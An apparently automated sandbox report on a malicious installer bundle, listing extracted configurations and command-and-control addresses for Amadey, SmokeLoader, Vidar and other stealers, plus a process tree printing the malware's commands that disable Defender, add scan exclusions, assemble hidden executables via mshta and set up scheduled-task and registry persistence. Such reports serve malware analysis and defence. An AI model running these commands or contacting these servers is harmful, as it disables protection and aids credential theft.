Analysis
-
max time kernel
66s -
max time network
5336s -
platform
windows7_x64 -
resource
win7-de-20211014 -
submitted
14-11-2021 09:04
General
-
Target
setup_x86_x64_install.exe
-
Size
8.4MB
-
MD5
dc3279eab20f1e9cff2a573c1f9ef8ee
-
SHA1
049e214cd7dc62c2d409c8cc060dcd9bcc6dcfc2
-
SHA256
edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4
-
SHA512
eaa28ef57863778175b0efc8075b7ad2909ef4d90efdc144db318d414e64ed5e0334c8fef656bd3286e05102676b780f7b754e23cf75f15797faa62fcf69fb3a
Score
10/10
Malware Config
Extracted
Family
amadey
Version
2.82
C2
185.215.113.45/g4MbvE/index.php
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
vidar
Version
48.3
Botnet
933
Attributes
-
profile_id
933
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
rc4.i32
rc4.i32
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
-
Loads dropped DLL 57 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 5 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07f05cf99e017109.exeSun07f05cf99e017109.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe"C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe"6⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 14726⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07923b89b57.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07923b89b57.exeSun07923b89b57.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8941195.exe"C:\Users\Admin\AppData\Roaming\8941195.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\6097009.exe"C:\Users\Admin\AppData\Roaming\6097009.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\7711949.exe"C:\Users\Admin\AppData\Roaming\7711949.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\6092579.exe"C:\Users\Admin\AppData\Roaming\6092579.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\2345679.exe"C:\Users\Admin\AppData\Roaming\2345679.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\1637676.exe"C:\Users\Admin\AppData\Roaming\1637676.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1637676.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\1637676.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1637676.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\1637676.exe" ) do taskkill -F -IM "%~Nxv"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "1637676.exe"9⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\Qw5u.exeQw5U.Exe -PmowtdFUhhnCoUk9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk "" == """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )10⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\8224331.exe"C:\Users\Admin\AppData\Roaming\8224331.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exeSun0768bf0e01cf08ac5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "" == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe" ) do taskkill -im "%~NXt" -f7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Sun0768bf0e01cf08ac5.exe" -f8⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe..\8S~LNTCBHnM.EXe -PhymCZvLUAWi8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "-PhymCZvLUAWi " == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" ) do taskkill -im "%~NXt" -f10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cloSe ( CREaTeObJecT ( "WscrIPT.sHELL" ). RUN ("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *10⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07bb82f51727fc79.exeSun07bb82f51727fc79.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Loads dropped DLL
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted.\soul3ss_crypted.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 9807⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0746b3c4631.exeSun0746b3c4631.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeSun07610e6b216b74271.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeC:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeC:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exeSun07e840e6fb5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp" /SL5="$2023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe"C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp" /SL5="$50238,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe" ss19⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun073980a935.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun073980a935.exeSun073980a935.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe"C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d46efb4bd1.exeSun07d46efb4bd1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun078a90701e.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun078a90701e.exeSun078a90701e.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6267732.exe"C:\Users\Admin\AppData\Roaming\6267732.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\5678468.exe"C:\Users\Admin\AppData\Roaming\5678468.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\8255491.exe"C:\Users\Admin\AppData\Roaming\8255491.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\2223985.exe"C:\Users\Admin\AppData\Roaming\2223985.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\4525193.exe"C:\Users\Admin\AppData\Roaming\4525193.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\2503320.exe"C:\Users\Admin\AppData\Roaming\2503320.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\2503320.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\2503320.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\2503320.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\2503320.exe" ) do taskkill -F -IM "%~Nxv"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "2503320.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\8306000.exe"C:\Users\Admin\AppData\Roaming\8306000.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 14248⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d7bdaf7c.exeSun07d7bdaf7c.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {BD38F809-82F9-409F-BD22-F66753B9433D} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵
-
-
C:\Users\Admin\AppData\Roaming\viteejjC:\Users\Admin\AppData\Roaming\viteejj2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~1⤵
-
C:\Windows\SysWOW64\control.execontrol ..\TSiZ8.~1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211114101744.log C:\Windows\Logs\CBS\CbsPersist_20211114101744.cab1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {55C1C84D-2549-4BCE-B866-7852B605F99E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {49C40F3B-C3BB-46EF-AE80-8018987CAEA9} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\7206.exeC:\Users\Admin\AppData\Local\Temp\7206.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
324KB
-
Filesize
324KB
-
Filesize
268KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
308KB
-
Filesize
456KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
6.2MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
320KB
-
Filesize
320KB
-
Filesize
88KB
-
Filesize
436KB
-
Filesize
512KB
-
Filesize
4KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
6.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
232KB
-
Filesize
232KB
-
Filesize
32KB
-
Filesize
256KB
-
Filesize
36KB
-
Filesize
8.7MB
-
Filesize
8.6MB
-
Filesize
4.1MB
-
Filesize
8KB
-
Filesize
2.1MB
-
Filesize
456KB
-
Filesize
108KB
-
Filesize
1.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
384KB
-
Filesize
7.0MB
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
1.0MB
-
Filesize
372KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
492KB
-
Filesize
852KB
-
Filesize
864KB